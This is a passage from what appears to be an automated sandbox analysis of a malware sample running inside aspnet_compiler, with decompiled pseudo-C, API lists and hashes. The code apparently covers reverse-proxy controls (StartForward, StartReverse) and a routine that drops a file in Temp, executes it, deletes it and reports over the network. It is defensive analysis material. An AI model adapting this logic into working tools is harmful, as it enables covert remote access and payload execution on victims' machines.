                    • Instruction ID: ccc14fa8acdac63bc9519f5215d42201de6c5a87ae6f625bde0ffe2347fa224d
                    • Opcode Fuzzy Hash: 768b996481d749ff10557c4c7c1c0a01c42c9ac738d115a97dc7b4c5a44c3e6d
                    • Instruction Fuzzy Hash: 07911871E002169BDF249EA5C981EEF7BB59F4A311F18062BEC00E7242D779CC498768
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E00443A7A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                    				signed int _v8;
                    				short _v270;
                    				short _v272;
                    				char _v528;
                    				char _v700;
                    				signed int _v704;
                    				signed int _v708;
                    				short _v710;
                    				signed int* _v712;
                    				signed int _v716;
                    				signed int _v720;
                    				signed int _v724;
                    				signed int* _v728;
                    				signed int _v732;
                    				signed int _v736;
                    				signed int _v740;
                    				signed int _v744;
                    				signed int _t149;
                    				void* _t156;
                    				signed int _t157;
                    				signed int _t158;
                    				intOrPtr _t159;
                    				signed int _t162;
                    				signed int _t166;
                    				signed int _t167;
                    				intOrPtr _t169;
                    				signed int _t172;
                    				signed int _t173;
                    				signed int _t175;
                    				signed int _t195;
                    				signed int _t196;
                    				signed int _t199;
                    				signed int _t204;
                    				signed int _t207;
                    				intOrPtr* _t213;
                    				intOrPtr* _t214;
                    				signed int _t225;
                    				signed int _t228;
                    				intOrPtr* _t229;
                    				signed int _t231;
                    				signed int* _t235;
                    				void* _t243;
                    				signed int _t244;
                    				intOrPtr _t246;
                    				signed int _t251;
                    				signed int _t253;
                    				signed int _t257;
                    				signed int* _t258;
                    				intOrPtr* _t259;
                    				short _t260;
                    				signed int _t262;
                    				signed int _t264;
                    				void* _t266;
                    				void* _t268;
                    
                    				_t262 = _t264;
                    				_t149 =  *0x46f00c; // 0x54ba778e
                    				_v8 = _t149 ^ _t262;
                    				_push(__ebx);
                    				_t207 = _a8;
                    				_push(__esi);
                    				_push(__edi);
                    				_t246 = _a4;
                    				_v744 = _t207;
                    				_v728 = E00446A95(_t207, __ecx, __edx) + 0x278;
                    				_push( &_v708);
                    				_t156 = E004431C4(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
                    				_t266 = _t264 - 0x2e4 + 0x18;
                    				if(_t156 != 0) {
                    					_t11 = _t207 + 2; // 0x6
                    					_t251 = _t11 << 4;
                    					__eflags = _t251;
                    					_t157 =  &_v272;
                    					_v716 = _t251;
                    					_t213 =  *((intOrPtr*)(_t251 + _t246));
                    					while(1) {
                    						_v704 = _v704 & 0x00000000;
                    						__eflags =  *_t157 -  *_t213;
                    						_t253 = _v716;
                    						if( *_t157 !=  *_t213) {
                    							break;
                    						}
                    						__eflags =  *_t157;
                    						if( *_t157 == 0) {
                    							L8:
                    							_t158 = _v704;
                    						} else {
                    							_t260 =  *((intOrPtr*)(_t157 + 2));
                    							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
                    							_v710 = _t260;
                    							_t253 = _v716;
                    							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
                    								break;
                    							} else {
                    								_t157 = _t157 + 4;
                    								_t213 = _t213 + 4;
                    								__eflags = _v710;
                    								if(_v710 != 0) {
                    									continue;
                    								} else {
                    									goto L8;
                    								}
                    							}
                    						}
                    						L10:
                    						__eflags = _t158;
                    						if(_t158 != 0) {
                    							_t214 =  &_v272;
                    							_t243 = _t214 + 2;
                    							do {
                    								_t159 =  *_t214;
                    								_t214 = _t214 + 2;
                    								__eflags = _t159 - _v704;
                    							} while (_t159 != _v704);
                    							_v720 = (_t214 - _t243 >> 1) + 1;
                    							_t162 = E00444A38(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
                    							_v732 = _t162;
                    							__eflags = _t162;
                    							if(_t162 == 0) {
                    								goto L1;
                    							} else {
                    								_v724 =  *((intOrPtr*)(_t253 + _t246));
                    								_t35 = _t207 * 4; // 0xcea3
                    								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
                    								_t38 = _t246 + 8; // 0x8b56ff8b
                    								_v740 =  *_t38;
                    								_t223 =  &_v272;
                    								_v712 = _t162 + 4;
                    								_t166 = E004463E1(_t162 + 4, _v720,  &_v272);
                    								_t268 = _t266 + 0xc;
                    								__eflags = _t166;
                    								if(_t166 != 0) {
                    									_t167 = _v704;
                    									_push(_t167);
                    									_push(_t167);
                    									_push(_t167);
                    									_push(_t167);
                    									_push(_t167);
                    									E0043A5E8();
                    									asm("int3");
                    									_t169 =  *0x470518; // 0x0
                    									return _t169;
                    								} else {
                    									__eflags = _v272 - 0x43;
                    									 *((intOrPtr*)(_t253 + _t246)) = _v712;
                    									if(_v272 != 0x43) {
                    										L19:
                    										_t172 = E00442ED1(_t207, _t223, _t246,  &_v700);
                    										_t225 = _v704;
                    										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
                    									} else {
                    										__eflags = _v270;
                    										if(_v270 != 0) {
                    											goto L19;
                    										} else {
                    											_t225 = _v704;
                    											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
                    										}
                    									}
                    									__eflags = _t207 - 2;
                    									if(_t207 != 2) {
                    										__eflags = _t207 - 1;
                    										if(_t207 != 1) {
                    											__eflags = _t207 - 5;
                    											if(_t207 == 5) {
                    												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
                    											}
                    										} else {
                    											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
                    										}
                    									} else {
                    										_t258 = _v728;
                    										_t244 = _t225;
                    										_t235 = _t258;
                    										 *(_t246 + 8) = _v708;
                    										_v712 = _t258;
                    										_v720 = _t258[8];
                    										_v708 = _t258[9];
                    										while(1) {
                    											_t64 = _t246 + 8; // 0x8b56ff8b
                    											__eflags =  *_t64 -  *_t235;
                    											if( *_t64 ==  *_t235) {
                    												break;
                    											}
                    											_t259 = _v712;
                    											_t244 = _t244 + 1;
                    											_t204 =  *_t235;
                    											 *_t259 = _v720;
                    											_v708 = _t235[1];
                    											_t235 = _t259 + 8;
                    											 *((intOrPtr*)(_t259 + 4)) = _v708;
                    											_t207 = _v744;
                    											_t258 = _v728;
                    											_v720 = _t204;
                    											_v712 = _t235;
                    											__eflags = _t244 - 5;
                    											if(_t244 < 5) {
                    												continue;
                    											} else {
                    											}
                    											L27:
                    											__eflags = _t244 - 5;
                    											if(__eflags == 0) {
                    												_t88 = _t246 + 8; // 0x8b56ff8b
                    												_t195 = E0044F9AC(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x45b4e8, 0x7f,  &_v528,  *_t88, 1);
                    												_t268 = _t268 + 0x1c;
                    												__eflags = _t195;
                    												_t196 = _v704;
                    												if(_t195 == 0) {
                    													_t258[1] = _t196;
                    												} else {
                    													do {
                    														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
                    														_t196 = _t196 + 1;
                    														__eflags = _t196 - 0x7f;
                    													} while (_t196 < 0x7f);
                    													_t199 = E004358BA( &_v528,  *0x46f170, 0xfe);
                    													_t268 = _t268 + 0xc;
                    													__eflags = _t199;
                    													_t258[1] = 0 | _t199 == 0x00000000;
                    												}
                    												_t103 = _t246 + 8; // 0x8b56ff8b
                    												 *_t258 =  *_t103;
                    											}
                    											 *(_t246 + 0x18) = _t258[1];
                    											goto L38;
                    										}
                    										__eflags = _t244;
                    										if(_t244 != 0) {
                    											 *_t258 =  *(_t258 + _t244 * 8);
                    											_t258[1] =  *(_t258 + 4 + _t244 * 8);
                    											 *(_t258 + _t244 * 8) = _v720;
                    											 *(_t258 + 4 + _t244 * 8) = _v708;
                    										}
                    										goto L27;
                    									}
                    									L38:
                    									_t173 = _t207 * 0xc;
                    									_t110 = _t173 + 0x45b428; // 0x40f943
                    									 *0x4574c8(_t246);
                    									_t175 =  *((intOrPtr*)( *_t110))();
                    									_t228 = _v724;
                    									__eflags = _t175;
                    									if(_t175 == 0) {
                    										__eflags = _t228 - 0x46f2a8;
                    										if(_t228 != 0x46f2a8) {
                    											_t257 = _t207 + _t207;
                    											__eflags = _t257;
                    											asm("lock xadd [eax], ecx");
                    											if(_t257 != 0) {
                    												goto L43;
                    											} else {
                    												_t128 = _t257 * 8; // 0x30ff068b
                    												E00445002( *((intOrPtr*)(_t246 + _t128 + 0x28)));
                    												_t131 = _t257 * 8; // 0x30ff0c46
                    												E00445002( *((intOrPtr*)(_t246 + _t131 + 0x24)));
                    												_t134 = _t207 * 4; // 0xcea3
                    												E00445002( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
                    												_t231 = _v704;
                    												 *((intOrPtr*)(_v716 + _t246)) = _t231;
                    												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
                    											}
                    										}
                    										_t229 = _v732;
                    										 *_t229 = 1;
                    										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
                    									} else {
                    										 *(_v716 + _t246) = _t228;
                    										_t115 = _t207 * 4; // 0xcea3
                    										E00445002( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
                    										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
                    										E00445002(_v732);
                    										 *(_t246 + 8) = _v740;
                    										goto L1;
                    									}
                    									goto L2;
                    								}
                    							}
                    						} else {
                    							goto L2;
                    						}
                    						goto L47;
                    					}
                    					asm("sbb eax, eax");
                    					_t158 = _t157 | 0x00000001;
                    					__eflags = _t158;
                    					goto L10;
                    				} else {
                    					L1:
                    					L2:
                    					return E004338BB(_v8 ^ _t262);
                    				}
                    				L47:
                    			}

                    APIs
                      • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                      • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                    • _memcmp.LIBVCRUNTIME ref: 00443D24
                    • _free.LIBCMT ref: 00443D95
                    • _free.LIBCMT ref: 00443DAE
                    • _free.LIBCMT ref: 00443DE0
                    • _free.LIBCMT ref: 00443DE9
                    • _free.LIBCMT ref: 00443DF5
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorLast$_abort_memcmp
                    • String ID: C
                    • API String ID: 1679612858-1037565863
                    • Opcode ID: 1b1c48012eeba7c920ea9576d40ce91f528395a5288f823ec30480752eb40b77
                    • Instruction ID: 0980accce80153226f5651e8385caabd2fc42b640f1cc77c082d88c635091a5b
                    • Opcode Fuzzy Hash: 1b1c48012eeba7c920ea9576d40ce91f528395a5288f823ec30480752eb40b77
                    • Instruction Fuzzy Hash: 71B16B75A016199FEB24DF18C884BAEB7B4FF08705F5085AEE849A7351E734AE90CF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 45%
                    			E00413C51(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
                    				intOrPtr _v0;
                    				char _v4;
                    				signed int _v8;
                    				signed short _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed short _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				signed int _v48;
                    				signed int _t70;
                    				signed short _t81;
                    				signed int _t82;
                    				signed short _t85;
                    				signed short _t86;
                    				void* _t88;
                    				signed int _t97;
                    				signed char _t99;
                    				void* _t100;
                    				signed int _t107;
                    				signed short _t108;
                    				signed int _t110;
                    				signed int _t116;
                    				signed int* _t118;
                    				signed int _t119;
                    				signed int _t120;
                    				intOrPtr _t121;
                    
                    				_t110 = _a8;
                    				_t99 = 0;
                    				_t120 = _a4;
                    				_t97 = 0;
                    				_v28 = 0;
                    				_v16 = 0;
                    				_v32 = 0;
                    				_v4 = 0;
                    				_v12 = 0;
                    				_v24 = 0;
                    				_v8 = 0;
                    				_v20 = 0;
                    				_t119 = 0;
                    				_t118 = _a16;
                    				 *_t118 = 0;
                    				if(_t120 != 0 || _t110 != 0) {
                    					_t70 = _a12;
                    					__eflags = _t70;
                    					if(_t70 == 0) {
                    						L20:
                    						_a16 = _t97;
                    						__eflags = _t110;
                    						if(_t110 == 0) {
                    							L40:
                    							__eflags = _t120;
                    							if(_t120 == 0) {
                    								__eflags = _v28 & 0x00000001;
                    								_t100 = 0;
                    								_t72 =  !=  ? _t100 : 0x7f000001;
                    								__imp__#8(0x7f000001);
                    								_t121 =  !=  ? _t100 : 0x7f000001;
                    								L47:
                    								_t73 = E004139B4(_t97, _v20, __eflags, _v36, _t121);
                    								 *_t118 = _t73;
                    								__eflags = _t73;
                    								if(_t73 != 0) {
                    									__eflags = _v0 - _t119;
                    									if(_v0 == _t119) {
                    										L54:
                    										__eflags = _v28;
                    										if(_v28 == 0) {
                    											L57:
                    											return _t119;
                    										}
                    										_t119 = E00413BD8(_v24,  *_t118);
                    										__eflags = _t119;
                    										if(_t119 == 0) {
                    											goto L57;
                    										}
                    										L56:
                    										E00413C16(_t73,  *_t118);
                    										 *_t118 =  *_t118 & 0x00000000;
                    										__eflags =  *_t118;
                    										goto L57;
                    									}
                    									 *_t73 =  *_t73 | 0x00000004;
                    									__eflags = _v32 & 0x00000002;
                    									if((_v32 & 0x00000002) == 0) {
                    										goto L54;
                    									}
                    									__imp__#12(_t121);
                    									 *((intOrPtr*)( *_t118 + 0x14)) = E00413936(_t73);
                    									_t73 =  *_t118;
                    									__eflags =  *((intOrPtr*)(_t73 + 0x14)) - _t119;
                    									if( *((intOrPtr*)(_t73 + 0x14)) != _t119) {
                    										goto L54;
                    									}
                    									_t119 = 8;
                    									L53:
                    									__eflags = _t119;
                    									if(_t119 != 0) {
                    										goto L56;
                    									}
                    									goto L54;
                    								}
                    								_t119 = 8;
                    								goto L56;
                    							}
                    							__eflags = E0041396E(_t120,  &_v4);
                    							if(__eflags != 0) {
                    								_t121 = _v4;
                    								goto L47;
                    							}
                    							_t73 = _v28;
                    							__eflags = _t73 & 0x00000004;
                    							if((_t73 & 0x00000004) == 0) {
                    								_push(_t118);
                    								_push(_t73 & 0x00000002);
                    								_push(_v32);
                    								_push(_v16);
                    								_t119 = E00413ACD(_t120, _t97);
                    								goto L53;
                    							}
                    							_t119 = 0x2af9;
                    							goto L56;
                    						}
                    						_t107 = E0043E19F(_t99, _t110,  &_v12, 0xa) & 0x0000ffff;
                    						_t81 = _v12;
                    						_v32 = _t107;
                    						__eflags =  *_t81;
                    						if( *_t81 != 0) {
                    							__eflags = _t97;
                    							if(_t97 == 0) {
                    								L26:
                    								__imp__#55(_a8, "udp");
                    								__eflags = _t81;
                    								if(_t81 != 0) {
                    									_t85 =  *(_t81 + 8) & 0x0000ffff;
                    									_v28 = _t85;
                    									_t81 = _t85 & 0x0000ffff;
                    									_v40 = _t81;
                    								}
                    								L28:
                    								__eflags = _t97;
                    								if(_t97 == 0) {
                    									L30:
                    									__imp__#55(_v0, "tcp");
                    									_t116 = 1;
                    									__eflags = _t81;
                    									if(_t81 == 0) {
                    										L32:
                    										_t108 = _v24;
                    										_t82 = _v48;
                    										L33:
                    										__eflags = _t82;
                    										if(_t82 != 0) {
                    											__eflags = _t97;
                    											if(_t97 != 0) {
                    												goto L40;
                    											}
                    											__eflags = _t108;
                    											_t97 = (_t97 & 0xffffff00 | _t108 == 0x00000000) + 1;
                    											__eflags = _t108;
                    											if(_t108 == 0) {
                    												L39:
                    												_t48 =  &_v40;
                    												 *_t48 = _v40 & _t119;
                    												__eflags =  *_t48;
                    												goto L40;
                    											}
                    											__eflags = _v36 - _t119;
                    											if(_v36 == _t119) {
                    												goto L39;
                    											}
                    											_v40 = _t116;
                    											goto L40;
                    										}
                    										__eflags = _t97;
                    										_t84 =  !=  ? 0x277d : 0x2af9;
                    										return  !=  ? 0x277d : 0x2af9;
                    									}
                    									_t108 =  *(_t81 + 8) & 0x0000ffff;
                    									_t82 = _t108 & 0x0000ffff;
                    									_v48 = _t82;
                    									goto L33;
                    								}
                    								_t116 = 1;
                    								__eflags = _t97 - 1;
                    								if(_t97 != 1) {
                    									goto L32;
                    								}
                    								goto L30;
                    							}
                    							__eflags = _t97 - 2;
                    							if(_t97 != 2) {
                    								goto L28;
                    							}
                    							goto L26;
                    						}
                    						__imp__#9(_t107);
                    						_t86 = _t81 & 0x0000ffff;
                    						__eflags = _t97;
                    						_v24 = _t86;
                    						_v36 = _t86 & 0x0000ffff;
                    						_t88 = 1;
                    						_t97 =  ==  ? _t88 : _t97;
                    						__eflags = _a12;
                    						_v28 = 0 | _a12 == 0x00000000;
                    						goto L40;
                    					}
                    					__eflags =  *((intOrPtr*)(_t70 + 0x10)) - _t99;
                    					if( *((intOrPtr*)(_t70 + 0x10)) != _t99) {
                    						L23:
                    						return 0x2afb;
                    					}
                    					__eflags =  *((intOrPtr*)(_t70 + 0x14)) - _t99;
                    					if( *((intOrPtr*)(_t70 + 0x14)) != _t99) {
                    						goto L23;
                    					}
                    					__eflags =  *((intOrPtr*)(_t70 + 0x18)) - _t99;
                    					if( *((intOrPtr*)(_t70 + 0x18)) != _t99) {
                    						goto L23;
                    					}
                    					__eflags =  *((intOrPtr*)(_t70 + 0x1c)) - _t99;
                    					if( *((intOrPtr*)(_t70 + 0x1c)) != _t99) {
                    						goto L23;
                    					}
                    					_t99 =  *_t70;
                    					_v28 = _t99;
                    					__eflags = _t99 & 0x00000002;
                    					if((_t99 & 0x00000002) == 0) {
                    						L11:
                    						__eflags =  *((intOrPtr*)(_t70 + 4)) - _t97;
                    						if( *((intOrPtr*)(_t70 + 4)) == _t97) {
                    							L14:
                    							_t97 =  *(_t70 + 8);
                    							__eflags = _t97;
                    							if(_t97 == 0) {
                    								L19:
                    								_v16 =  *((intOrPtr*)(_t70 + 0xc));
                    								goto L20;
                    							}
                    							__eflags = _t97 - 1;
                    							if(_t97 == 1) {
                    								goto L19;
                    							}
                    							__eflags = _t97 - 2;
                    							if(_t97 == 2) {
                    								goto L19;
                    							}
                    							__eflags = _t97 - 3;
                    							if(_t97 == 3) {
                    								goto L19;
                    							}
                    							return 0x273c;
                    						}
                    						__eflags =  *((intOrPtr*)(_t70 + 4)) - 2;
                    						if( *((intOrPtr*)(_t70 + 4)) == 2) {
                    							goto L14;
                    						}
                    						return 0x273f;
                    					}
                    					__eflags = _t120;
                    					if(_t120 != 0) {
                    						goto L11;
                    					}
                    					return 0x2726;
                    				} else {
                    					return 0x2af9;
                    				}
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: tcp$udp
                    • API String ID: 0-3725065008
                    • Opcode ID: 989d942223f8045c26bfd392dcc121cd2c507f3a9003dba06f7d9cf9a685d5a6
                    • Instruction ID: 254d435c4adeb88c6bd87cc200726294b993cf902dfc57313b1be41f1fc3726a
                    • Opcode Fuzzy Hash: 989d942223f8045c26bfd392dcc121cd2c507f3a9003dba06f7d9cf9a685d5a6
                    • Instruction Fuzzy Hash: A77188706083028FDB24CE15D4846ABBBE4EF94746F14493FF88597360E779CE858B9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 67%
                    			E00410A38(void* __edx, void* __eflags, intOrPtr _a4) {
                    				char _v32;
                    				char _v56;
                    				void* _v60;
                    				char _v72;
                    				char _v76;
                    				char _v80;
                    				char _v88;
                    				char _v92;
                    				void* _v96;
                    				char _v108;
                    				char _v112;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				intOrPtr* _t26;
                    				char* _t34;
                    				char* _t37;
                    				intOrPtr _t50;
                    				char* _t51;
                    				char* _t58;
                    				intOrPtr _t60;
                    				intOrPtr _t61;
                    				char* _t65;
                    				void* _t68;
                    				intOrPtr _t121;
                    				void* _t125;
                    				void* _t128;
                    				void* _t130;
                    				void* _t131;
                    				void* _t133;
                    				void* _t135;
                    				signed int _t136;
                    				void* _t139;
                    				void* _t140;
                    				void* _t141;
                    				void* _t145;
                    
                    				_t147 = __eflags;
                    				_t111 = __edx;
                    				_push(_t68);
                    				_t121 = _a4;
                    				E004020D6(_t68,  &_v76, __edx, __eflags, _t121 + 0xc);
                    				SetEvent( *(_t121 + 0x24));
                    				_t26 = E00401F8B( &_v80);
                    				E00404182( &_v80,  &_v56, 4, 0xffffffff);
                    				_t139 = (_t136 & 0xfffffff8) - 0x3c;
                    				E004020D6(0x472ec8, _t139, _t111, _t147, 0x472ec8);
                    				_t140 = _t139 - 0x18;
                    				E004020D6(0x472ec8, _t140, _t111, _t147,  &_v72);
                    				E0041A976( &_v112, _t111);
                    				_t141 = _t140 + 0x30;
                    				_t125 =  *_t26 - 0x46;
                    				if(_t125 == 0) {
                    					E00401E45( &_v88, _t111, _t135, __eflags, 1);
                    					_t34 = E0040245C();
                    					E00401F8B(E00401E45( &_v92, _t111, _t135, __eflags, 1));
                    					_t112 = _t34;
                    					_t37 = E00411235();
                    					_t127 = _t37;
                    					__eflags = _t37;
                    					if(__eflags == 0) {
                    						_t128 = _t141 - 0x18;
                    						_push("1");
                    						L19:
                    						_t111 = E00402F11( &_v32, E00401E45( &_v88, _t112, _t135, __eflags, 0), _t135, 0x472ec8);
                    						E00408832(0x472ec8, _t128, _t39, _t121, _t135, __eflags);
                    						_push(0x85);
                    						E00404A81(_t121, _t39, __eflags);
                    						E00401FB8();
                    						L20:
                    						E00401E6D( &_v108, _t111);
                    						E00401FB8();
                    						E00401FB8();
                    						return 0;
                    					}
                    					 *0x470d50 = E004114AA(_t127, "StartForward");
                    					 *0x470d4c = E004114AA(_t127, "StartReverse");
                    					 *0x470d54 = E004114AA(_t127, "StopForward");
                    					_t50 = E004114AA(_t127, "StopReverse");
                    					_t112 = "GetDirectListeningPort";
                    					 *0x470d5c = _t50;
                    					_t51 = E004114AA(_t127, "GetDirectListeningPort");
                    					__eflags =  *0x470d50;
                    					 *0x470d58 = _t51;
                    					if(__eflags == 0) {
                    						L17:
                    						_t128 = _t141 - 0x18;
                    						_push("2");
                    						goto L19;
                    					}
                    					__eflags =  *0x470d4c;
                    					if(__eflags == 0) {
                    						goto L17;
                    					}
                    					__eflags =  *0x470d54;
                    					if(__eflags == 0) {
                    						goto L17;
                    					}
                    					__eflags = _t51;
                    					if(__eflags == 0) {
                    						goto L17;
                    					}
                    					 *0x470d49 = 1;
                    					E004020D6(0x472ec8, _t141 - 0x18, "GetDirectListeningPort", __eflags, E00401E45( &_v88, "GetDirectListeningPort", _t135, __eflags, 0));
                    					_push(0x76);
                    					L10:
                    					E00404A81(_t121, _t112, __eflags);
                    					goto L20;
                    				}
                    				_t130 = _t125 - 1;
                    				if(_t130 == 0) {
                    					_t58 =  *0x470d50(E0043A3AC(_t55, E00401F8B(E00401E45( &_v88, _t111, _t135, __eflags, 0))));
                    					_t145 = _t141 - 0x14;
                    					L9:
                    					_t112 = _t58;
                    					E0041A6E9(0x472ec8, _t145, _t58);
                    					_push(0x77);
                    					goto L10;
                    				}
                    				_t131 = _t130 - 1;
                    				if(_t131 == 0) {
                    					_t60 =  *0x470adc; // 0xedf140
                    					_t61 =  *((intOrPtr*)(_t60 + 0x18));
                    					__imp__#12( *((intOrPtr*)(_t61 + 4)));
                    					_t65 =  *0x470d4c(_t61, E0043A3AC(_t62, E00401F8B(E00401E45( &_v92, _t111, _t135, __eflags, 0))) & 0x0000ffff);
                    					__eflags = _t65;
                    					_t109 =  !=  ? 1 :  *0x470d4a & 0x000000ff;
                    					 *0x470d4a =  !=  ? 1 :  *0x470d4a & 0x000000ff;
                    					_t112 = _t65;
                    					E0041A6E9(0x472ec8, _t141 - 0x10, _t65);
                    					_push(0x78);
                    					goto L10;
                    				}
                    				_t133 = _t131 - 1;
                    				if(_t133 == 0) {
                    					_t58 =  *0x470d54();
                    					_t145 = _t141 - 0x18;
                    					goto L9;
                    				}
                    				if(_t133 == 1) {
                    					 *0x470d5c();
                    					 *0x470d4a = 0;
                    				}
                    				goto L20;
                    			}

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Eventinet_ntoa
                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                    • API String ID: 3578746661-168337528
                    • Opcode ID: f8b804ea664db580410c84c6d40a1447952e14db6ab85270271298b77444c8bb
                    • Instruction ID: e75f285b9767d1c550f565d519be053d97adf82a0a3bf380a10654d69fa8857e
                    • Opcode Fuzzy Hash: f8b804ea664db580410c84c6d40a1447952e14db6ab85270271298b77444c8bb
                    • Instruction Fuzzy Hash: A051D631A043009BC714BB79D81A66E36A5AB80314F40453FF90AA76E5EF7C9985CBDF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E00416BCD(void* __edx, void* __eflags, char _a4, char _a28) {
                    				char _v28;
                    				struct _SHELLEXECUTEINFOA _v88;
                    				char _v112;
                    				char _v136;
                    				char _v316;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t33;
                    				void* _t41;
                    				intOrPtr _t50;
                    				signed int _t60;
                    				char* _t68;
                    				void* _t73;
                    				void* _t90;
                    				void* _t91;
                    
                    				_t94 = __eflags;
                    				_t33 = E00402073(_t60,  &_v136, __edx, _t90, "\\");
                    				_t87 = E004052DD(_t60,  &_v112, E0043A9AA(_t60, __eflags, "Temp"), _t90, _t94, _t33);
                    				E00402EF0(_t60,  &_v28, _t35, _t90, _t94,  &_a4);
                    				E00401FB8();
                    				_t68 =  &_v136;
                    				E00401FB8();
                    				_push(_t68);
                    				_push(_t68);
                    				_t41 = E00416E0A(E0040F0F6( &_v316, _t35, _t94, E00401F8B( &_v28), 0x10),  &_v316);
                    				_t95 = _t41;
                    				if(_t41 == 0) {
                    					E00402073(_t60, _t91 - 0x18, _t87, _t90, 0x464074);
                    					_push(0x6f);
                    					_t73 = 0x473580;
                    					goto L6;
                    				} else {
                    					_t87 =  &_a28;
                    					E00416E1A( &_v316,  &_a28, _t95);
                    					E0040F0A7( &_v316,  &_a28, _t95);
                    					_v88.hwnd = _v88.hwnd & 0x00000000;
                    					_v88.lpVerb = _v88.lpVerb & 0x00000000;
                    					_v88.cbSize = 0x3c;
                    					_v88.fMask = 0x40;
                    					_t50 = E00401F8B( &_v28);
                    					asm("movaps xmm0, [0x46b1c0]");
                    					_v88.lpFile = _t50;
                    					asm("movups [ebp-0x40], xmm0");
                    					_t60 = _t60 & 0xffffff00 | ShellExecuteExA( &_v88) != 0x00000000;
                    					_t97 = _v88.hProcess;
                    					if(_v88.hProcess != 0) {
                    						E00402073(_t60, _t91,  &_a28, _t90, 0x464074);
                    						_push(0x70);
                    						E00404A81(0x473580, _t87, _t97);
                    						WaitForSingleObject(_v88.hProcess, 0xffffffff);
                    						CloseHandle(_v88.hProcess);
                    						DeleteFileA(E00401F8B( &_v28));
                    					}
                    					_t98 = _t60 - 1;
                    					if(_t60 == 1) {
                    						E00402073(_t60, _t91 - 0x18, _t87, _t90, 0x464074);
                    						_push(0x6e);
                    						_t73 = 0x473580;
                    						L6:
                    						E00404A81(_t73, _t87, _t98);
                    					}
                    				}
                    				E0040E8CD(_t60,  &_v316, 0x464074);
                    				E00401FB8();
                    				E00401FB8();
                    				return E00401FB8();
                    			}

                    APIs
                      • Part of subcall function 00416E1A: __EH_prolog.LIBCMT ref: 00416E1F
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00464074), ref: 00416CCA
                    • CloseHandle.KERNEL32(00000000), ref: 00416CD3
                    • DeleteFileA.KERNEL32(00000000), ref: 00416CE2
                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416C96
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                    • String ID: <$@$Temp
                    • API String ID: 1704390241-1032778388
                    • Opcode ID: ff9cea69b05bc38d64019fd9820552f1091102cc02052d8ee4391d685e661bf1
                    • Instruction ID: 69e270f03dbcf525bbd0e705c12af2ecc391514570d21efb9077f5f7aa5c102b
                    • Opcode Fuzzy Hash: ff9cea69b05bc38d64019fd9820552f1091102cc02052d8ee4391d685e661bf1
                    • Instruction Fuzzy Hash: A54196319002099BDB14FBA1DC56AED7738AF50318F50427EF505760D2EF785A86CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E00406FD7(intOrPtr __ecx, void* __eflags, intOrPtr _a8, char _a12, char _a16, void* _a36, char _a40, void _a52, char _a64, intOrPtr _a100052, intOrPtr _a100072, char _a100080) {
